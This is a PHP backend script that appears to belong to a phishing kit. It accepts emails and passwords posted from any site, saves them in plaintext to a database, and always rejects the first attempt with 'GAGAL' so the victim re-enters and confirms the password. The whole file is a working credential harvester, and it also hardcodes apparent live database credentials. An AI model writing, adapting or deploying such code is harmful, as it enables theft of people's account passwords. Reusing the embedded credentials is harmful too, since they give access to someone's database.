<?php
// server.php

header('Access-Control-Allow-Origin: *');
header('Content-Type: text/html; charset=UTF-8');

// Database connection (update with your credentials)
$host = 'localhost';
$dbname = 'blawzmfo_jerido';
$user = 'blawzmfo_jeri';
$password = 'Ekemena2@';

try {
    $pdo = new PDO("mysql:host=$host;dbname=$dbname", $user, $password);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
    send_response('DB_CONNECTION_ERROR');
}

// Helper function to send a response
function send_response($message) {
    echo $message;
    exit;
}

// Generate a unique session ID for each form submission
function generate_session_id() {
    return bin2hex(random_bytes(16));
}

// Check if the request is POST
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Retrieve and sanitize inputs
    $email = isset($_POST['e']) ? trim($_POST['e']) : '';
    $password = isset($_POST['p']) ? trim($_POST['p']) : '';

    // Validate inputs
    if (empty($email)) {
        send_response('EMAIL_MISSING'); // Missing email
    }

    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
        send_response('INVALID_EMAIL_FORMAT'); // Invalid email format
    }

    if (empty($password)) {
        send_response('PASSWORD_SAVED'); // Prompt to enter password
    }

    // Step 1: Check if the session ID exists in the database for the current email
    $stmt = $pdo->prepare("SELECT session_id, first_password FROM users WHERE email = :email ORDER BY id DESC LIMIT 1");
    $stmt->execute(['email' => $email]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);

    if (!$user) {
        // No existing session, create a new one with the first password
        $session_id = generate_session_id();
        $stmt = $pdo->prepare("INSERT INTO users (email, session_id, first_password) VALUES (:email, :session_id, :first_password)");
        $stmt->execute([
            'email' => $email,
            'session_id' => $session_id,
            'first_password' => $password,
        ]);
        send_response('GAGAL'); // Incorrect password message to prompt for the second password
    }

    // Step 2: If session exists, process the second password
    $session_id = $user['session_id'];
    $first_password = $user['first_password'];

    if ($first_password && empty($user['second_password'])) {
        // Save the second password and compare with the first password
        if ($password === $first_password) {
            // Passwords match, update the database
            $stmt = $pdo->prepare("UPDATE users SET second_password = :second_password WHERE email = :email AND session_id = :session_id");
            $stmt->execute([
                'second_password' => $password,
                'email' => $email,
                'session_id' => $session_id,
            ]);
            send_response('VALID'); // Successful login
        } else {
            send_response('GAGAL'); // Passwords do not match
        }
    }

    // If all else fails, return an unexpected error
    send_response('UNEXPECTED_ERROR');
} else {
    // Response for invalid request method
    send_response('INVALID_REQUEST_METHOD');
}
